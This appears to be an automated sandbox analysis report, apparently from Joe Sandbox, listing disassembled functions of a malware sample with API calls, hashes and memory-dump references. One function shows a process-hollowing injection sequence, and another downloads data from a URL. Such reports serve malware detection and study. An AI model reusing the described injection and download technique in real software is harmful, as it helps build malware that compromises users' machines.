                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                            • String ID: f'`
                                                                                                                                                                                            • API String ID: 269201875-611106237
                                                                                                                                                                                            • Opcode ID: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
                                                                                                                                                                                            • Instruction ID: e10de683f00683c66f2b40ff100f43b0a774272d7684a508812009893d8ff5ce
                                                                                                                                                                                            • Opcode Fuzzy Hash: 281d487da2bb61c23457510c2bd3b4544aa2be80b10df96796662e11b974a315
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F012C72C0025DAFCF42AFE88D019EF7FB6BF08350F144165BA25A21E1E6318A209B91
                                                                                                                                                                                            Function 00602727 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1757 602727-60274d call 6024fd 1760 6027a6-6027a9 1757->1760 1761 60274f-602761 call 60ad8f 1757->1761 1763 602766-60276b 1761->1763 1763->1760 1764 60276d-6027a5 1763->1764
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                            • Opcode ID: cfbf2b513e35c1d62e21ddf63b7baaafb57e60d0ea150dd91d9de4dac6bc91e1
                                                                                                                                                                                            • Instruction ID: 9ecc46a5f862eb346c37ca1d202689ef73d24e6697ad5ab84ffee3ecfc1137f3
                                                                                                                                                                                            • Opcode Fuzzy Hash: cfbf2b513e35c1d62e21ddf63b7baaafb57e60d0ea150dd91d9de4dac6bc91e1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 95111575A0420AAFCF09DF58E945EDB7BF9EF88314F0440A9F809AB351D670EA11CB65
                                                                                                                                                                                            Function 0060AA68 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1765 60aa68-60aa8c CreateFileW
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,0060AE58,?,?,00000000,?,0060AE58,00000000,0000000C), ref: 0060AA85
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                            • Opcode ID: 1931130c7c7fb08b824463673cc2d96ae0b415809730fc92d9f0884e1e327368
                                                                                                                                                                                            • Instruction ID: bf39a23acdd1e0f5d73bcf8fdb37cb4328571c7c9cf0776b64bbe71b375e5f23
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1931130c7c7fb08b824463673cc2d96ae0b415809730fc92d9f0884e1e327368
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AD06C3204014DBBDF028F84DC06EDA3BAAFB48714F018010FE1856020C772E871AB90

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 005F0782 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005F0788
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005F0796
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005F07A7
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005F07B8
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005F07C9
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005F07DA
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 005F07EB
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005F07FC
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 005F080D
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005F081E
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005F082F
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005F0840
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005F0851
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005F0862
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005F0873
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005F0884
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005F0895
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005F08A6
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 005F08B7
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 005F08C8
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 005F08D9
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 005F08EA
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 005F08FB
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 005F090C
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 005F091D
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 005F092E
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005F093F
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 005F0950
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005F0961
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005F0972
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 005F0983
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 005F0994
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 005F09A5
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 005F09B6
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 005F09C7
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 005F09D8
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 005F09E9
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 005F09FA
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 005F0A0B
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 005F0A1C
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 005F0A2D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                            • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                                                                            • API String ID: 667068680-295688737
                                                                                                                                                                                            • Opcode ID: d0951e696655437e66d960fcda008afbf135f7d6d862480ba3ce9e8aa38d5866
                                                                                                                                                                                            • Instruction ID: 52448f559a6761eaeed5811d977ee1eff36647b5e7192769e222bb16cca2ee89
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0951e696655437e66d960fcda008afbf135f7d6d862480ba3ce9e8aa38d5866
                                                                                                                                                                                            • Instruction Fuzzy Hash: F761BA71DD2720ABEB505FB4AE0D8873EEBEA2D701305291AB212D2161D7F6B491CF91
                                                                                                                                                                                            Function 005DA330 Relevance: 33.8, APIs: 17, Strings: 2, Instructions: 520memorycomCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 005DA352
                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 005DA36E
                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 005DA378
                                                                                                                                                                                            • CoCreateInstance.OLE32(00610EB8,00000000,00000001,00610EC8,?), ref: 005DA3B0
                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 005DA3BA
                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 005DA476
                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 005DA4A1
                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 005DA4C1
                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 005DA4D4
                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 005DA6E0
                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 005DA7F4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: String$AllocUninitialize$Initialize$BlanketCreateFreeInstanceProxySecurity
                                                                                                                                                                                            • String ID: dey68$r`A
                                                                                                                                                                                            • API String ID: 1334779090-1493988896
                                                                                                                                                                                            • Opcode ID: 988ffd54e2ba06b5fcbb81ea0bead3397458c45b1ee0157b58b0a5dbcb0ee0ff
                                                                                                                                                                                            • Instruction ID: 3a412e876dc92c190163873edf4a71409e8d6d451329b2bab4547b0722d3e729
                                                                                                                                                                                            • Opcode Fuzzy Hash: 988ffd54e2ba06b5fcbb81ea0bead3397458c45b1ee0157b58b0a5dbcb0ee0ff
                                                                                                                                                                                            • Instruction Fuzzy Hash: DB12E135A102199BDB15DBB8CC45BDEBB75BF99304F14875AF804B73A1EB31AA81CB40
                                                                                                                                                                                            Function 005D4780 Relevance: 30.3, APIs: 16, Strings: 1, Instructions: 544injectionmemorythreadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 005D480B
                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 005D4826
                                                                                                                                                                                            • GetThreadContext.KERNEL32(?,00010002), ref: 005D487C
                                                                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 005D48A7
                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 005D4934
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 005D4AF7
                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 005D4B34
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 005D4B3D
                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 005D4B5D
                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 005D4B7F
                                                                                                                                                                                            • SetThreadContext.KERNEL32(?,00010002), ref: 005D4D4C
                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 005D4D6B
                                                                                                                                                                                            • VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 005D4D88
                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 005D4DCD
                                                                                                                                                                                            • VirtualProtectEx.KERNEL32(?,?,?,00000001,?), ref: 005D4E8A
                                                                                                                                                                                            • ResumeThread.KERNEL32(?), ref: 005D4EB0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ProcessVirtual$Memory$AllocThreadWrite$ContextProtect$AddressCreateErrorHandleLastModuleProcReadResume
                                                                                                                                                                                            • String ID: 1/(&I
                                                                                                                                                                                            • API String ID: 1965314979-1488106507
                                                                                                                                                                                            • Opcode ID: ff4b78778783c3fcab4816c396306e6b2bc40780154deab1c40677ea8bd28340
                                                                                                                                                                                            • Instruction ID: 01477185b5f9b7d94e300cc0709d9f7b62d25a5d3064553f3382b352ad1d8ebc
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff4b78778783c3fcab4816c396306e6b2bc40780154deab1c40677ea8bd28340
                                                                                                                                                                                            • Instruction Fuzzy Hash: 67228E31E012199BEB25CFA9DC41BAEBBB5FF55304F14866BE805B7251E731AA81CF40
                                                                                                                                                                                            Function 00607BCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,~`,00000002,00000000,?,?,?,00607EEB,?,00000000), ref: 00607C66
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,~`,00000002,00000000,?,?,?,00607EEB,?,00000000), ref: 00607C8F
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,00607EEB,?,00000000), ref: 00607CA4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: ACP$OCP$~`
                                                                                                                                                                                            • API String ID: 2299586839-3512132812
                                                                                                                                                                                            • Opcode ID: 419dd016f39911cbafce85b32e6c63e2d889d6bf70bea55c3155c1ae3619fbd5
                                                                                                                                                                                            • Instruction ID: e198e30fba0fc733208f318b7d72a237580b1807bfdb572fcea4ac02cfdc204a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 419dd016f39911cbafce85b32e6c63e2d889d6bf70bea55c3155c1ae3619fbd5
                                                                                                                                                                                            • Instruction Fuzzy Hash: A621C432E88100AEFB3C8F54C904AD773A7EB54B55B5A8864E90AC7294E732FD41C350
                                                                                                                                                                                            Function 005D5880 Relevance: 9.6, APIs: 6, Instructions: 644networkfileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005D5A8A
                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 005D5CA2
                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 005D5CB6
                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 005D5E9D
                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 005D605D
                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 005D6062
                                                                                                                                                                                              • Part of subcall function 005D5610: ___std_exception_copy.LIBVCRUNTIME ref: 005D5638
                                                                                                                                                                                              • Part of subcall function 005F1930: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000104,00000104,00000000,005EF478,00000104,0061CEB4,?,00000104,?,?), ref: 005F1990
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Internet$CloseHandle$Open$ExceptionFileRaiseRead___std_exception_copy
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4074124989-0
                                                                                                                                                                                            • Opcode ID: 99f8c3ee510295ba1685eab650f4e7991750df7ddfb2818aa7280d8a37ce9ffd
                                                                                                                                                                                            • Instruction ID: 0a130618e04a2afca6dde0cd6f58d7234dde70b496af1dec67ef56f0974385f3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 99f8c3ee510295ba1685eab650f4e7991750df7ddfb2818aa7280d8a37ce9ffd
                                                                                                                                                                                            • Instruction Fuzzy Hash: C4422676D216558BEB12DB78C8457DDFBB4BF66340F14871BE800B7292FB3166828B40
                                                                                                                                                                                            Function 00607DA2 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005FCA90: GetLastError.KERNEL32(005D1920,00000001,005D1924,005F6D0D,00000001,00000000,00000000,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCA95
                                                                                                                                                                                              • Part of subcall function 005FCA90: SetLastError.KERNEL32(00000000,00000006,000000FF,?,005FCD85,00000000,00000000,00000001,00000000,005D1920,00000104), ref: 005FCB33
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCAF2
                                                                                                                                                                                              • Part of subcall function 005FCA90: _free.LIBCMT ref: 005FCB28
                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00607EAE
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00607EF7
                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 00607F06
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00607F4E
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00607F6D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 949163717-0
                                                                                                                                                                                            • Opcode ID: e3848f9ac8edccbb8c4ff648265b1c2b37106ca31574752e707f4fa290268c2d
                                                                                                                                                                                            • Instruction ID: 0ddf8dbbd393436ec4970527767d24f124c8aea0737adc3fe2a605b3e32a6692
                                                                                                                                                                                            • Opcode Fuzzy Hash: e3848f9ac8edccbb8c4ff648265b1c2b37106ca31574752e707f4fa290268c2d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B517071E4520AABDB14DFA5DC45AFB77BABF08700F1448A9A510E72D0E770AD418B61
                                                                                                                                                                                            Function 005DD550 Relevance: 6.5, Strings: 4, Instructions: 1511COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: ,`$fSEQXVuIP\Z2A$fSEQXVuIP\Z2A$qD^N\i^NT_SzA
                                                                                                                                                                                            • API String ID: 0-606821963
                                                                                                                                                                                            • Opcode ID: 155e98ff5c40fb49d328f13856e6c317f078362def765c14258667d8b10518e3
                                                                                                                                                                                            • Instruction ID: b77ce1b5cc414c20b16adaf9424b4c01b504093149e292388f9322a9288d48b4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 155e98ff5c40fb49d328f13856e6c317f078362def765c14258667d8b10518e3
                                                                                                                                                                                            • Instruction Fuzzy Hash: EED23735D212598AEB06DB78C8467DDF775BFAA344F14C71BE801B6662FB31A6C28700
                                                                                                                                                                                            Function 005F1434 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005F1440
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 005F150C
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005F152C
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 005F1536
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1678536053.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1678516949.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678577435.000000000060E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678614331.000000000061F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1678830020.0000000000622000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5d0000_RPHbzz3JqY.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
